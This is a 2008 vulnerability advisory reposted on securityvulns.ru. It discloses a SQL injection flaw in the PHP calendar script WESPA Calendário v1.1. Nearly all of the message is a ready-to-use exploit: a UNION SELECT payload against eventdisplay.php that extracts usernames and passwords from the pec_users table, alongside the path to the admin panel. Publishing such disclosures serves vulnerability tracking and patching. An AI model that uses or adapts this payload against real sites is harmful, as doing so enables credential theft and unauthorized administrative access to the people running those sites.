Computer Security

Security Advisory: WESPA Calendário v1.1 Sql Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  OneNews Beta 2 Multiple Vulnerabilities

  Full path disclosure and SQL Injection vulnerabilities in Envolution

From:Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:24.08.2008
Subject:WESPA Calendário v1.1 Sql Injection Vulnerability


####################################################################

#-# WESPA Calendário v1.1 Sql Injection Vulnerability

#-# Discovered by : Alemin_Krali

#-# My Site : al3m.blogspot.com

#-# Script Download : http://www.scriptbrasil.com.br/download/codigo/6502/

#-# Admin Panel : /scriptpath/useradmin.php


#-# Exploit :

eventdisplay.php?id=-999+union+select+concat(username,0x3a,password),
null,null+from+pec_users/*

#######################################################################

_________________________________________________________________
Þimdi aileye katýlmanýn tam zamaný - Yeni nesil Ücretsiz Windows Live Hizmetlerini þimdi edinin!
http://get.live.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru